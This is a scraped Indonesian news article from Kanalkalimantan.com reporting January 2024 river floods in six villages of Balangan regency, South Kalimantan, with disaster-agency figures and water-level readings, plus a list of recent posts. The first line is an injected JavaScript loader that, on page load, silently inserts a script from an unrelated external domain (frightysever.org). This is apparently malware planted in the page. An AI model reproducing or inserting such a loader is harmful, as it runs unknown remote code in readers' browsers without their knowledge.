(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Balangan

Enam Desa di Tiga Kecamatan Alami Banjir


KANALKALIMANTAN.COM, PARINGIN – Enam desa pada tiga kecamatan di Kabupaten Balangan, Kalimantan Selatan, alami banjir akibat luapan air sungai setelah diguyur hujan dengan curah tinggi beberapa hari belakangan.“Desa pertama yaitu Desa Mihu di Kecamatan Juai, yang mana ada terdampak sekitar 54 buah rumah milik warga setempat,” kata Kepala Pelaksana BPBD Balangan Rahmi, Rabu (17/1/2024).

Rahmi melanjutkan, selain di Kecamatan Juai, banjir juga terjadi di Desa Hujan Mas RT 01 dan RT 02, Kecamatan Paringin, sebanyak 21 rumah yang terdampak banjir.

Kemudian di Kecamatan Lampihong meliputi Desa Kusambi Hilir, Desa Lajar RT 04, Desa Papuyuan RT 03 dan Desa Matang Hanau RT 04 dan 05.

Menurut Rahmi, banjir diprediksi kembali meluas jika curah hujan terus meningkat dalam beberapa hari ke depan karena debit air sungai akan bertambah ketika di daerah pegunungan diguyur hujan maka air sungai akan mengalami kenaikan.

Oleh karena itu, Rahmi mengingatkan warga di daerah pinggiran sungai untuk tetap waspada karena sejumlah daerah di Balangan masih berpotensi hujan dan yang juga bisa terjadi pada malam hari.

Selain itu, untuk warga yang terdampak banjir pihaknya juga mulai menyalurkan bantuan logistik yang didampingi oleh TRC Kecamatan (Si Jari Tangguh) kepada pihak desa setempat yang nantinya disalurkan kepada masyarakat terdampak banjir.

Rahmi menambahkan saat ini kondisi debit air masih terbilang aman, berdasarkan pemantauan ketinggian permukaan air sungai Tabuan Kecamatan Halong dan Sungai Awayan Kecamatan Awayan melalui via Early Warning System (EWS).

Adapun hasil pemantauannya, di Sungai Tabuan Kecamatan Halong dengan (Koordinat-2,3101s115,6779) data ketinggian air terkini yaitu 156.79 sentimeter (Normal).

Kemudian di Bendungan Pitap Desa Nungka Kecamatan Awayan (Koordinat-2°26’47”,115°32’39”,92,4m,315°) data ketinggian air terkini yaitu 789.92 sentimeter (Normal).

“Pemantauan selalu aktif kami lakukan dan logistik juga disiagakan bagi warga yang terdampak banjir, yang tak kalah penting kami juga selalu memberikan himbauan kepada masyarakat, terutama orangtua agar anak-anak yang sering mandi dan bermain di sungai untuk selalu waspada dan hati-hati,” pungkas Rahmi. (Kanalkalimantan.com/mcbalangan)

Editor: kk


Muhammad Andi

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

2 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

4 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

4 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

5 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

9 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

12 jam ago

This website uses cookies.